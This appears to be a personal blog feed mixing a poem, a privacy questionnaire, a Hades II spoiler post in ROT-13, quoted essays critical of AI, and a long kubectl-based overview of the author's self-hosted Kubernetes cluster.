You can add one of the channel declarations directly where indicated above. Then guix home reconfigure again (you can see the result in ~/.config/guix/channels.scm), and then guix pull to fetch the channel. Now you can e.g. #:use-module (saayix packages terminals) and add ghostty to your (packages …) list!

(a → a) → a

2026-02-08T06:17:11Z

I cannot remain one thing
I cannot remain two things
I cannot remain three things
I cannot remain n things

All I know is that I am not
I am the other, but I am not
What I am is everything
But I am not

To understand every view
To believe in none of them
To befriend everyone
To be seen by none

Every choice forceful and every choice forced
Every choice meaningful and every meaning forced
Meaningless in every choice
Acceptance another choice

please pass this information on

2026-02-01T03:20:57Z

January 2026 Five Questions

2026-01-31T09:01:09Z

Source.

What do you do when someone you don’t know on a social or business network site tries to become a “friend” or otherwise connected to you?

I don’t use social networks. If I receive a connection request on LinkedIn from someone I don’t know, I ignore it.

Do you worry about the data being collected by websites and search engines and what do you do to protect yourself? What do you advise for those who are not as technically skilled yet concerned nonetheless to do?

Somewhat. I use a privacy-focused open-source browser not affiliated with a for-profit company, LibreWolf, in its default strict protection setting My searches all go through my own little helper. I don’t (knowingly) use websites that egregiously track users or otherwise try to violate end-user privacy. I pay for my email hosting. I don’t use Cloudflare to terminate my TLS, and the analytics I use I collect myself.

For those concerned, I would start by recommending using a similar browser — an enormous amount of our digital life is negotiated through browsers, so it makes a difference. Firefox is OK, but you might as well use LibreWolf or Waterfox (nice!) or something. There are probably similarly-oriented Chromium-based browsers but I haven’t looked into it deeply — I use ungoogled-chromium when I need to test in one. (Please don’t use Brave, they consistently engage in shady practices.)

Next is probably email, because it’s typically full of personal stuff! There are many good email hosts that aren’t Google or Microsoft. If you don’t have to pay for your email hosting, there is a reason, and it’s not good. I use Fastmail. Here’s a Lobste.rs “ask” post with more suggestions. Ideally find something in a jurisdiction close to you. Or not, if you live in the United States.

How do you reward yourself for completing a difficult task?

Make a cup of tea, though that often happens at both ends. Lately I’ve been playing little bits of games between larger or more difficult tasks, or reading.

Have you or your family been affected by a natural disaster?

Not particularly. Australian drought culture of the late 90s/early 00s felt a little bit like one. Does a pandemic count?

Have you ever called in a request or a dedication on a radio show or online radio stream?

Nope!

grab bag

2026-01-30T06:14:28Z

strange funny what zombiejesus notsure canttouchthis angrydome evil_lincoln dots u8 fishy union special_characters punch_card r#match i_yield match_nested_if monkey_barrel 𝚌𝚘𝚗𝚝𝚒𝚗𝚞𝚎 function bathroom_stall closure_matching semisemisemisemisemi useful_syntax infcx return_already fake_macros fish_fight

garbage

2026-01-29T23:11:53Z

I fucking hate reading LLM-written/assisted drivel, or worse, probably slop, waiting to see if the same bullshit tropes repeat too many times to be coincidence. This demeans all of us. Especially you.

hades Ⅱ statue%!!

2026-01-26T12:57:48Z

Having 100%’d the achievements, I felt like I was pretty done with the game, but one little thing kept bugging me: the last of the three statues, which don’t have an achievement other than the feeling!

I’d managed the 24 Fear Overworld run component while playing through, but the 32 Fear Underworld was pretty darn Hard. After a bit of time off from the game I found myself doing a single 32 Fear Underworld run every few nights, noticing what was making it hard and what I felt like I could deal with, and then tonight after switching weapons and adjusting a crucial component of the Fear, voilà!!

I think the Fear is the bit that most needs “solving” to make this completeable (and to a much, much lesser extent, Arcana), so I’m linking them instead. Arcana and Fear — don’t look (or keep reading) if you wanna figure out what works for you on your own!

ROT-13 discussion of what I found key:

Evinyf Puebabf vf whfg zrffrq hc. Zl bgure nggrzcgf cerggl zhpu havirefnyyl raqrq va znxvat vg gb uvz — fbzrgvzrf yvzcvat ol gung cbvag — naq qlvat. V guvax V tbg gb uvf guveq sbez bapr, whfg oneryl. Ur trg naq uvf zvavbaf trg fb zhpu fgebatre. Znxvat gur qrpvfvba gb gnxr gur sbhe Srne uvg ol gheavat vg bss sbe uvz naq ohzcvat hc bgure guvatf jnf jung znqr Gur qvssrerapr. Nybat gur jnl V yrnearq gung lbh ernyyl qba’g jnag gb qb nalguvat gung erdhverf lbh gb fnpevsvpr be fxvc obbaf vs ng nyy cbffvoyr — lbh arrq gur QCF. V qvqa’g jnag gb srry ehfurq fb V tnir zlfrys n jubyr 9 zvahgrf cre ovbzr.

Gur bgure guvat jnf fjvgpuvat sebz zl orybirq Yvz naq Bebf (Negrzvf) gb Ltavhz (Fhcnl). V qvqa’g rira unir Fhcnl yriryyrq nyy gur jnl, ohg vg’f whfg irel fgebat nf vf, naq gur enatr (bapr V tbg hfrq gb erylvat ba vg) urycrq n ybg jvgu gur snfgre naq zber ahzrebhf sbrf. (V qvqa’g rira unir n Ehfu Obba va gur raq?! Yby jubbcf, fbeel Fhcnl.)

Gur xvg zrnag V bayl ybfg n yvsr bapr, qhevat Fplyyn be Preorehf (v sbetbe yby. ybbxf yvxr preorehf gub). Aba-eviny Puebabf jnf n jnyx va gur cnex nsgre rirelguvat gung yrq gb uvz!

Something has gone wrong

2026-01-26T10:55:16Z

on llms (Ⅲ)

2026-01-24T07:37:52Z

The Monastery at the End of the World: into the woods—AI is not therapy:

Machines will destroy the very idea of therapy. Who would pay to have someone sit with them in uncomfortable silence, when you can snuggle under your warm doona with a voice that is always there, always comforting, always making you feel better? And that is so important, because you always need someone. A person who will listen and talk, like the machine. Because you’re still suffering. Every day, the stress, the anxiety, the depression, they just keep circling back. As you get more and more comfort from better and better machines, your short-term buzz masks a deeper and deeper descent into madness.

Over the years, your machine is always there. It whispers its words of wisdom, and you, tired and sad and alone, take those words into your heart until they become your own. Little by little, your mind is colonized by the unthoughts of a machine, until your own mind is constantly echoing and repeating the unthought, lost under so many layers of time and memory that you cannot even begin to distinguish what is yours and what is the machine’s.

fiona fokus: I don’t care how well your “AI” works:

In a world where fascists redefine truth, where surveillance capitalist companies, more powerful than democratically elected leaders, exert control over our desires, do we really want their machines to become part of our thought process? To share our most intimate thoughts and connections with them?

AI systems exist to reinforce and strengthen existing structures of power and violence. They are the wet dream of capitalists and fascists. Enormous physical infrastructure designed to convert capital into power, and back into capital. Those who control the infrastructure, control the people subject to it.

AI systems being egregiously resource intensive is not a side effect — it’s the point.

Craft, expression and skilled labor is what produces value, and that gives us control over ourselves. In order to further centralize power, craft and expression need to be destroyed. And they sure are trying.

Wesley’s Notebook: The “Resonant Computing Manifesto” is not very good:

I am once again asking for a single example of what the fuck you are talking about. People who feel like LLMs produce output that is “responding fluidly to the context and particularity of each human” are living in a entirely different world than I am.

Scott Jenson: The Timmy Trap:

When I speak on this topic, I bring out a standard yellow pencil with googly eyes stuck near the eraser end and a pipe cleaner wrapped around it for arms. I call him Timmy and, animating him like a puppet, have him say “hello” to the audience. Of course, they all say hello back. Timmy then describes how much he likes to draw with children and make them laugh. I ask what he wants to be when he grows up and he says, “To be A UX designer, just like you.”

I reply, “Aww, that’s really too bad, Timmy.”

Then, I hold him up horizontally in front of my face and abruptly snap him in half.

The audience gasps.

It’s a shocking moment, and I’ve been told by many, it’s the most memorable part of the talk. The reason is simple: they felt a connection to Timmy. They had known him for only 15 seconds, yet they still perceived the act of snapping him in half as violent.

That’s why LLMs can fool us so easily. If we can form a human connection with a pencil in just 15 seconds, imagine how we’ll feel about an “AI system” we spend an hour with. We want them to be human. This is why we call their frequent mistakes “hallucinations,” a term that implies a temporary lapse. But it’s not a lapse; it’s a fundamental lack of human cognition.

Miriam Eric Suzanne: Tech continues to be political (And the politics aren’t looking great):

Haven’t you heard? They’re building a digital god who will lead us to salvation, uploaded into the virgo supercluster where we can expand the light of exponential profit throughout the cosmos! This is the actual narrative of several AI CEOs, despite being easy to dismiss as hyperbolic nonsense. Why won’t I focus on the actual use-cases?

Why won’t you focus on the actual documented harms? Somehow there is always room for people to dismiss concerns as “overblown and unfounded” past the first attempted coup, and well into an authoritarian power grab.

But the bigger issue is that they don’t have to be successful to be dangerous. Because along the way, these companies get to steal our work and sell it back to us, lower our wages, de-skill our field, bury us in slop, and mire us in algorithmic bureaucracy. If the long-term space god thing doesn’t work out, at least they can make a profit in the short-term.

The beliefs of these CEOs aren’t incidental to the AI product they’re selling us. These are not tools designed for us to benefit from, but tools designed to exploit us. To poison our access to jobs, and our access to information at the same time.

I said on social media that people believe what chatbots tell them, and I was laughed at. No one would trust a chatbot, silly! That same day, several different friends and colleagues quoted the output of an ‘AI’ to me in unrelated situations, as though quoting reliable facts.

So now a select few companies run by billionaires control much of the information that people see – “summarized” without sources. Meanwhile, there’s an oligarchy taking power in the US. Meanwhile, Grok’s entire purpose is to be ‘anti-woke’ and anti-trans, ChatGPT’s political views are shifting right, and Anthropic is partnering with Palantir.

Seems chill. I bet ‘agents’ are cool.

Wouldn’t want to eat a shrimp cocktail in the rain.

Addison Crump: Crashing Out:

It’s impressive that programmers can now “write more code” “more quickly”. It’s largely debated whether that’s actually desirable, or even the case at all. Frankly, in my eyes, the problem is not that we do not have enough code; the problem is that we’ve already written so much with so little regard for its quality or purpose. As we are more able to produce code quickly with so little care, we will rely less on solid, community-developed solutions, turning to easy, barely “working” ones.

Mechanical Survival: Team dynamics after AI:

Whilst this failure is a little disappointing, it’s interesting to observe that this doesn’t work. It’s signal. We can now say: we live in a world, sorry, an “emerging reality”, where we can have [waves hand] anything at any time to a basic level of competence, and all of the real problems, the “people problems” still exist. And this is finally proof positive, hard evidence, that artefacts are not really what we’re here for. We are demonstrably optimising about a mile from the bottleneck. AI may be giving you a million prototypes, but if you listen, AI is telling you in quite a painful way that being able to get feedback on your artefacts is much, much more important than the artefacts themselves.

…

For me, the information environment at work resembles nothing so much as the attention economy we all know and hate from outside work, where content jostles for our eyeballs. The drivers when I open my phone are dopamine, social validation. But at work my attention tends to be directed by anxiety, time pressure, and purpose (if I can get it). And there’s one more difference, which is that at work, there are potentially quite serious consequences for missing a beat.

So just as the social algorithms are feeding me content that’s in the neighbourhood of content I seem to like, at work I’m operating my own algorithm, choosing what to permit myself to become invested in. This is how I spend my one wild and precious life. And when I choose to attend I’m dipping my cup into a stream that is very fast-flowing and very deep.

When AI offers us the means to deal with “too much information”, the proposition must be that it will automate that internal “algorithm” that decides what we attend to. Like a mother bird partially digests a worm before regurgitating it into her babies’ mouths, AI can hunt down the valuable information, partially digest it, and regurgitate it into me.

These summaries are automated sense-making, relentlessly compressing the uncompressable.

Somehow people are surprised that getting the AI to be accurate is difficult. But it’s not a technology problem, it’s a philosophy problem. You are trying to satisfy billion-dimensional, ever-changing, utterly subjective, embodied “truth”. And this thing will also supposedly give us all the unbiased view from nowhere. And we will achieve this, supposedly, through “guardrails”? But that just doesn’t make sense.

…

Whether AI is compressing or expanding “context”, it clutters the team’s information environment. When it summarises it misses, when it expands it invents. The meaning of things that are in the process of naming, perhaps that are in the process of being pulled apart for naming, must be continually negotiated between us as people.

There is literally no other way to make sense of things.

cluster overview

2026-01-18T03:23:15Z

I should probably add some distinction between dev and prod mode for next time, oops.

Here follows a ~~short~~ overview of the current state of the Kubernetes cluster that constitutes my infrastructure. I link to the Flux bits and pieces that install and configure them. It’s more personal documentation than anything useful for others.

$ k gns
NAME              STATUS   AGE
cert-manager      Active   105d
chog              Active   105d
default           Active   105d
enbi              Active   105d
external-dns      Active   105d
flux-system       Active   105d
furpoll           Active   105d
ingress-nginx     Active   105d
kube-node-lease   Active   105d
kube-public       Active   105d
kube-system       Active   105d
kv                Active   105d
linkding          Active   105d
miniflux          Active   105d
minio-kala        Active   105d
minio-operator    Active   105d
nossa             Active   105d
outline           Active   105d
postgres-cassax   Active   105d
shynet            Active   105d
static            Active   105d

`cert-manager`

$ k cert-manager ga
NAME                                           READY   STATUS    RESTARTS      AGE
pod/cert-manager-58dd99f969-knhn9              1/1     Running   1 (46d ago)   105d
pod/cert-manager-cainjector-55cd9f77b5-jlqwh   1/1     Running   1 (46d ago)   105d
pod/cert-manager-webhook-7987476d56-xfvn5      1/1     Running   1 (46d ago)   105d

NAME                              TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)            AGE
service/cert-manager              ClusterIP   10.90.202.51    <none>        9402/TCP           105d
service/cert-manager-cainjector   ClusterIP   10.90.246.184   <none>        9402/TCP           105d
service/cert-manager-webhook      ClusterIP   10.90.71.86     <none>        443/TCP,9402/TCP   105d

NAME                                      READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/cert-manager              1/1     1            1           105d
deployment.apps/cert-manager-cainjector   1/1     1            1           105d
deployment.apps/cert-manager-webhook      1/1     1            1           105d

NAME                                                 DESIRED   CURRENT   READY   AGE
replicaset.apps/cert-manager-58dd99f969              1         1         1       105d
replicaset.apps/cert-manager-cainjector-55cd9f77b5   1         1         1       105d
replicaset.apps/cert-manager-webhook-7987476d56      1         1         1       105d

Standard install of cert-manager.

This works really reliably. A couple weeks ago I had all my certs expire at once — it turned out a bug in my DNS provider caused all my domains to have an invalid CAA set, so none of them were renewing.

`chog`

$ k chog ga
NAME                               READY   STATUS    RESTARTS      AGE
pod/chog-deploy-8697ddd585-7p5rz   2/2     Running   3 (46d ago)   49d

NAME                          READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/chog-deploy   1/1     1            1           105d

NAME                                     DESIRED   CURRENT   READY   AGE
replicaset.apps/chog-deploy-64bbcf5b65   0         0         0       85d
replicaset.apps/chog-deploy-6bd86f7689   0         0         0       105d
replicaset.apps/chog-deploy-8697ddd585   1         1         1       49d

A little Discord bot which takes care of some sundries for me and Annie.

Install via kustomize
CUE-based setup, build with enbi

`default`

$ k default ga
NAME                 TYPE        CLUSTER-IP   EXTERNAL-IP   PORT(S)   AGE
service/kubernetes   ClusterIP   10.90.0.1    <none>        443/TCP   105d

`enbi`

$ k enbi ga
NAME                                           READY   STATUS      RESTARTS   AGE
pod/enbi-controller-manager-54c5d7fdb5-xxj7l   1/1     Running     0          14d
pod/podwatcher-647d55454f-647d55454f-5nw2f     0/1     Completed   0          15h

NAME                                              TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)    AGE
service/enbi-controller-manager-metrics-service   ClusterIP   10.90.179.225   <none>        8443/TCP   105d

NAME                                      READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/enbi-controller-manager   1/1     1            1           105d

NAME                                                 DESIRED   CURRENT   READY   AGE
replicaset.apps/enbi-controller-manager-54c5d7fdb5   1         1         1       14d
replicaset.apps/enbi-controller-manager-649b47b448   0         0         0       49d
replicaset.apps/enbi-controller-manager-6b65b4fdfb   0         0         0       49d

NAME                                         STATUS     COMPLETIONS   DURATION   AGE
job.batch/podwatcher-647d55454f-647d55454f   Complete   1/1           108s       15h

NAME                                          IMAGE TAG                                                       SYSTEM         STATUS      BUILD NODE   AGE
nixbuild.enbi.hrzn.ee/podwatcher-5f9d56bc9f   nossa.ee/talya/kv:211c28182fcb5ae15cd102388fa823e890acdd42      x86_64-linux   Succeeded   kala         15h
nixbuild.enbi.hrzn.ee/podwatcher-647d55454f   nossa.ee/talya/kv:dc48721dd93d0a0d305453c9c68b50d18b3ca022      x86_64-linux   Failed      kala         15h
nixbuild.enbi.hrzn.ee/podwatcher-79c6b5548b   nossa.ee/talya/nossa:6181112bcc45ee79482b619f0a6e838dcb3be43b   x86_64-linux   Succeeded   kala         14d

enbi, Operator that builds images on demand.

Install via kustomize
CUE-based setup, build with itself
kubebuilder manifests for CRD, policies, etc.

`external-dns`

$ k external-dns ga
NAME                                READY   STATUS    RESTARTS   AGE
pod/external-dns-58f666b7f9-7gww2   2/2     Running   0          15d

NAME                   TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)             AGE
service/external-dns   ClusterIP   10.90.161.171   <none>        7979/TCP,8080/TCP   105d

NAME                           READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/external-dns   1/1     1            1           105d

NAME                                      DESIRED   CURRENT   READY   AGE
replicaset.apps/external-dns-58f666b7f9   1         1         1       15d
replicaset.apps/external-dns-5cf8f9499b   0         0         0       15d
replicaset.apps/external-dns-6fdcd965dd   0         0         0       15d
replicaset.apps/external-dns-7d9bc99bbb   0         0         0       15d

Standard install of ExternalDNS, with fork of external-dns-bunny-webhook for the heavy lifting.

Install via Helm

ExternalDNS itself works reliably, the Bunny.net provider has needed so much work. It works OK for me now (after quite a few head-scratchers), but I wouldn’t recommend it to you.

`flux-system`

$ k flux-system ga
NAME                                           READY   STATUS    RESTARTS      AGE
pod/flux-operator-5f966f8fbc-6dqgg             1/1     Running   4 (15d ago)   105d
pod/helm-controller-5cbb6bd454-5pb8n           1/1     Running   4 (15d ago)   105d
pod/kustomize-controller-757dff9666-ck9hm      1/1     Running   4 (15d ago)   105d
pod/notification-controller-55d7f99bf9-r855t   1/1     Running   4 (15d ago)   105d
pod/source-controller-88749965c-lht44          1/1     Running   4 (15d ago)   105d

NAME                              TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)    AGE
service/flux-operator             ClusterIP   10.90.248.179   <none>        8080/TCP   105d
service/notification-controller   ClusterIP   10.90.245.193   <none>        80/TCP     105d
service/source-controller         ClusterIP   10.90.113.157   <none>        80/TCP     105d
service/webhook-receiver          ClusterIP   10.90.4.185     <none>        80/TCP     105d

NAME                                      READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/flux-operator             1/1     1            1           105d
deployment.apps/helm-controller           1/1     1            1           105d
deployment.apps/kustomize-controller      1/1     1            1           105d
deployment.apps/notification-controller   1/1     1            1           105d
deployment.apps/source-controller         1/1     1            1           105d

NAME                                                 DESIRED   CURRENT   READY   AGE
replicaset.apps/flux-operator-5f966f8fbc             1         1         1       105d
replicaset.apps/helm-controller-5cbb6bd454           1         1         1       105d
replicaset.apps/kustomize-controller-757dff9666      1         1         1       105d
replicaset.apps/notification-controller-55d7f99bf9   1         1         1       105d
replicaset.apps/source-controller-88749965c          1         1         1       105d

Standard install of Flux. It works the way I want it to, and I’ve never had problems prying it apart or debugging it when I’ve done questionable things.

Bootstrap via an auto-deployed chart in k3s

`furpoll`

$ k furpoll ga
NAME                    SCHEDULE                    TIMEZONE              SUSPEND   ACTIVE   LAST SCHEDULE   AGE
cronjob.batch/furpoll   07 7,10,13,18,21,23 * * *   Australia/Melbourne   False     0        48m             105d

Very simple private message checker. This keeps getting into failing loops because of hostIP shenanigans and OpenSMTPD not listening on the mesh interface since it hasn’t come up yet.

Install via kustomize
CUE-based setup for cronjob, build with enbi

`ingress-nginx`

$ k ingress-nginx ga
NAME                                            READY   STATUS    RESTARTS   AGE
pod/ingress-nginx-controller-67cc5cc697-rv4hg   1/1     Running   0          42d

NAME                                         TYPE        CLUSTER-IP    EXTERNAL-IP      PORT(S)                      AGE
service/ingress-nginx-controller             NodePort    10.90.99.47   51.161.136.132   80:32080/TCP,443:32443/TCP   105d
service/ingress-nginx-controller-admission   ClusterIP   10.90.28.90   <none>           443/TCP                      105d

NAME                                       READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/ingress-nginx-controller   1/1     1            1           105d

NAME                                                  DESIRED   CURRENT   READY   AGE
replicaset.apps/ingress-nginx-controller-67cc5cc697   1         1         1       42d
replicaset.apps/ingress-nginx-controller-778b7dfb8f   0         0         0       105d

Standard install of Ingress NGINX. Now retired, hah. :/

Install via Helm, kustomize
Configured with annotations throughout

`kube-node-lease`

$ k kube-node-lease ga
No resources found in kube-node-lease namespace.

`kube-public`

$ k kube-public ga
No resources found in kube-public namespace.

`kube-system`

$ k kube-system ga
NAME                                          READY   STATUS      RESTARTS      AGE
pod/coredns-6d668d687-pncqs                   1/1     Running     0             15d
pod/helm-install-flux-operator-42sn6          0/1     Completed   0             15d
pod/local-path-provisioner-869c44bfbd-7pg5b   1/1     Running     0             15d
pod/metrics-server-7bfffcd44-kczwl            1/1     Running     1 (46d ago)   50d

NAME                     TYPE        CLUSTER-IP    EXTERNAL-IP   PORT(S)                        AGE
service/kube-dns         ClusterIP   10.90.0.10    <none>        53/UDP,53/TCP,9153/TCP         105d
service/kubelet          ClusterIP   None          <none>        10250/TCP,10255/TCP,4194/TCP   105d
service/metrics-server   ClusterIP   10.90.91.59   <none>        443/TCP                        105d

NAME                                     READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/coredns                  1/1     1            1           105d
deployment.apps/local-path-provisioner   1/1     1            1           105d
deployment.apps/metrics-server           1/1     1            1           105d

NAME                                                DESIRED   CURRENT   READY   AGE
replicaset.apps/coredns-6d668d687                   1         1         1       15d
replicaset.apps/local-path-provisioner-869c44bfbd   1         1         1       15d
replicaset.apps/metrics-server-7bfffcd44            1         1         1       50d

NAME                                   STATUS     COMPLETIONS   DURATION   AGE
job.batch/helm-install-flux-operator   Complete   1/1           16s        15d

`kv`

$ k kv ga
NAME                     READY   STATUS    RESTARTS   AGE
pod/kv-dcbf57c54-msngk   3/3     Running   0          15h

NAME         TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)                  AGE
service/kv   ClusterIP   10.90.216.102   <none>        80/TCP,81/TCP,9090/TCP   105d

NAME                 READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/kv   1/1     1            1           105d

NAME                            DESIRED   CURRENT   READY   AGE
replicaset.apps/kv-6f5c6d7fc6   0         0         0       15h
replicaset.apps/kv-bf8bd6978    0         0         0       15h
replicaset.apps/kv-dcbf57c54    1         1         1       15h

This blog!

Install via kustomize
CUE-based setup, build with enbi

`linkding`

$ k linkding ga
NAME                            READY   STATUS    RESTARTS      AGE
pod/linkding-6b55479478-4j8bx   1/1     Running   1 (46d ago)   105d

NAME               TYPE        CLUSTER-IP    EXTERNAL-IP   PORT(S)    AGE
service/linkding   ClusterIP   10.90.133.1   <none>        9090/TCP   105d

NAME                       READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/linkding   1/1     1            1           105d

NAME                                  DESIRED   CURRENT   READY   AGE
replicaset.apps/linkding-5666f9b576   0         0         0       105d
replicaset.apps/linkding-6b55479478   1         1         1       105d
replicaset.apps/linkding-7954846cb4   0         0         0       105d

linkding is a nice little self-hosted bookmark manager. I wrote some CUE to configure it in k8s more nicely.

`miniflux`

$ k miniflux ga
NAME                         READY   STATUS    RESTARTS   AGE
pod/miniflux-b76bbb9-2hw8v   1/1     Running   0          46d

NAME               TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)    AGE
service/miniflux   ClusterIP   10.90.105.109   <none>        8080/TCP   105d

NAME                       READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/miniflux   1/1     1            1           105d

NAME                               DESIRED   CURRENT   READY   AGE
replicaset.apps/miniflux-b76bbb9   1         1         1       105d

Miniflux is a self-hosted RSS reader. As above.

`minio-kala` and `minio-operator`

$ k minio-kala ga
NAME                      READY   STATUS    RESTARTS      AGE
pod/myminio-pool-kala-0   2/2     Running   2 (46d ago)   105d

NAME                      TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)    AGE
service/minio             ClusterIP   10.90.127.99    <none>        443/TCP    105d
service/myminio-console   ClusterIP   10.90.149.242   <none>        9443/TCP   105d
service/myminio-hl        ClusterIP   None            <none>        9000/TCP   105d

NAME                                 READY   AGE
statefulset.apps/myminio-pool-kala   1/1     105d
$ k minio-operator ga
NAME                                 READY   STATUS    RESTARTS      AGE
pod/minio-operator-58fb9bb48-k6ddz   1/1     Running   1 (46d ago)   105d
pod/minio-operator-58fb9bb48-qjwns   0/1     Pending   0             105d

NAME               TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)    AGE
service/operator   ClusterIP   10.90.85.65    <none>        4221/TCP   105d
service/sts        ClusterIP   10.90.196.22   <none>        4223/TCP   105d

NAME                             READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/minio-operator   1/2     2            1           105d

NAME                                       DESIRED   CURRENT   READY   AGE
replicaset.apps/minio-operator-58fb9bb48   2         2         1       105d

MinIO is — was? — an S3-compatible object store. MinIO Operator deploys that into Kubernetes automatically, setting up clustering etc.

I’m probably going to try replacing it with Garage soon.

`nossa`

$ k nossa ga
NAME                         READY   STATUS    RESTARTS   AGE
pod/nossa-67dc84b64d-wrnpj   3/3     Running   0          12d

NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
service/nossa   ClusterIP   10.90.193.94   <none>        80/TCP,81/TCP,9090/TCP   105d

NAME                    READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/nossa   1/1     1            1           105d

NAME                               DESIRED   CURRENT   READY   AGE
replicaset.apps/nossa-67dc84b64d   1         1         1       12d

nóssa is my code store! Now more than ever, we must not rely on corporations to host our source.

Install via kustomize
CUE-based setup, build with enbi

`outline`

$ k outline ga
NAME                           READY   STATUS    RESTARTS      AGE
pod/outline-864ffd9f49-frb8j   1/1     Running   1 (46d ago)   49d
pod/outline-redis-0            1/1     Running   1 (46d ago)   105d

NAME                    TYPE        CLUSTER-IP    EXTERNAL-IP   PORT(S)    AGE
service/outline         ClusterIP   10.90.11.37   <none>        3000/TCP   105d
service/outline-redis   ClusterIP   None          <none>        6379/TCP   105d

NAME                      READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/outline   1/1     1            1           105d

NAME                                 DESIRED   CURRENT   READY   AGE
replicaset.apps/outline-668fb7849d   0         0         0       105d
replicaset.apps/outline-864ffd9f49   1         1         1       49d

NAME                             READY   AGE
statefulset.apps/outline-redis   1/1     105d

Outline is a self-hostable knowledge base/wiki. I don’t like it very much, but the solution you have is better than the one you don’t.

Install via kustomize
CUE-based setup, uses a fork I build manually

`postgres-cassax`

$ k postgres-cassax ga
NAME                                     READY   STATUS    RESTARTS      AGE
pod/postgres-0                           1/1     Running   1 (46d ago)   105d
pod/postgres-operator-75d58485b9-p6nxk   1/1     Running   1 (46d ago)   105d

NAME                        TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)    AGE
service/postgres            ClusterIP   10.90.104.198   <none>        5432/TCP   105d
service/postgres-config     ClusterIP   None            <none>        <none>     105d
service/postgres-operator   ClusterIP   10.90.130.173   <none>        8080/TCP   105d
service/postgres-repl       ClusterIP   10.90.47.202    <none>        5432/TCP   105d

NAME                                READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/postgres-operator   1/1     1            1           105d

NAME                                           DESIRED   CURRENT   READY   AGE
replicaset.apps/postgres-operator-75d58485b9   1         1         1       105d
replicaset.apps/postgres-operator-85d7544db4   0         0         0       105d

NAME                        READY   AGE
statefulset.apps/postgres   1/1     105d

NAME                                                                  IMAGE                             CLUSTER-LABEL   SERVICE-ACCOUNT   MIN-INSTANCES   AGE
operatorconfiguration.acid.zalan.do/postgres-operator-configuration   ghcr.io/zalando/spilo-17:4.0-p2   cassax          postgres-pod      -1              105d

NAME                                TEAM     VERSION   PODS   VOLUME   CPU-REQUEST   MEMORY-REQUEST   AGE    STATUS
postgresql.acid.zalan.do/postgres   cassax   17        1      10Gi     100m          100Mi            105d   Running

Zalando’s Postgres Operator just work™s? I’m surprised but so far I’ve had no issues, even when using replication. (I particularly like that you can have it drop generated secrets into target namespaces.)

`shynet`

$ k shynet ga
NAME                                       READY   STATUS    RESTARTS      AGE
pod/shynet-celeryworker-7c85c7c7b7-4k95g   1/1     Running   1 (46d ago)   105d
pod/shynet-redis-0                         1/1     Running   1 (46d ago)   105d
pod/shynet-webserver-6897985f7f-6zdv5      1/1     Running   2 (46d ago)   105d

NAME                               TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)    AGE
service/shynet-redis               ClusterIP   None            <none>        6379/TCP   105d
service/shynet-webserver-service   ClusterIP   10.90.167.165   <none>        8080/TCP   105d

NAME                                  READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/shynet-celeryworker   1/1     1            1           105d
deployment.apps/shynet-webserver      1/1     1            1           105d

NAME                                             DESIRED   CURRENT   READY   AGE
replicaset.apps/shynet-celeryworker-7c85c7c7b7   1         1         1       105d
replicaset.apps/shynet-celeryworker-cc8bdf8d5    0         0         0       105d
replicaset.apps/shynet-webserver-6897985f7f      1         1         1       105d
replicaset.apps/shynet-webserver-7bf96ff48c      0         0         0       105d

NAME                            READY   AGE
statefulset.apps/shynet-redis   1/1     105d

Shynet is a “privacy-friendly” self-hosted web analytics service. It gives me a very basic idea of how much traffic my sites get.

I’d de-duplicate the Redises between Outline and Shynet one day, or, I’ll just not ¯\_(ツ)_/¯

`static`

$ k static ga
No resources found in static namespace.

This namespace only exists for the Flux kustomization, oops.

$ k % gi -A
NAMESPACE    NAME                           CLASS   HOSTS                           ADDRESS          PORTS     AGE
kv           kv                             nginx   kivikakk.ee                     51.161.136.132   80, 443   105d
linkding     linkding                       nginx   tracks.hrzn.ee                  51.161.136.132   80, 443   105d
miniflux     miniflux                       nginx   rss.hrzn.ee                     51.161.136.132   80, 443   105d
minio-kala   s3.hrzn.ee                     nginx   s3.hrzn.ee,s3-console.hrzn.ee   51.161.136.132   80, 443   105d
minio-kala   static-comrak.ee               nginx   comrak.ee                       51.161.136.132   80, 443   105d
minio-kala   static-eka.kivikakk.ee         nginx   eka.kivikakk.ee                 51.161.136.132   80, 443   105d
minio-kala   static-f.hrzn.ee               nginx   f.hrzn.ee                       51.161.136.132   80, 443   105d
minio-kala   static-hrzn.ee                 nginx   hrzn.ee                         51.161.136.132   80, 443   105d
minio-kala   static-kindnessalliance.love   nginx   kindnessalliance.love           51.161.136.132   80, 443   105d
minio-kala   static-kinu.ee                 nginx   kinu.ee                         51.161.136.132   80, 443   105d
minio-kala   static-lottia.net              nginx   lottia.net                      51.161.136.132   80, 443   105d
nossa        nossa                          nginx   nossa.ee                        51.161.136.132   80, 443   105d
outline      outline                        nginx   adc.hrzn.ee                     51.161.136.132   80, 443   105d
shynet       shynet-webserver-ingress       nginx   shynet.hrzn.ee                  51.161.136.132   80, 443   105d

The kustomization configures all the ingresses.

things i did last year

2026-01-04T10:23:23Z

In no particular order:

Finally learned Elixir/Phoenix.
- Wrote this blog engine, nóssa (which I’m slowly giving some love again), chog, and Pipa!
Finally learned Kubernetes.
- Went through about 3½ cluster topologies before settling on the current thing. etcd really is a temperamental baby, huh.
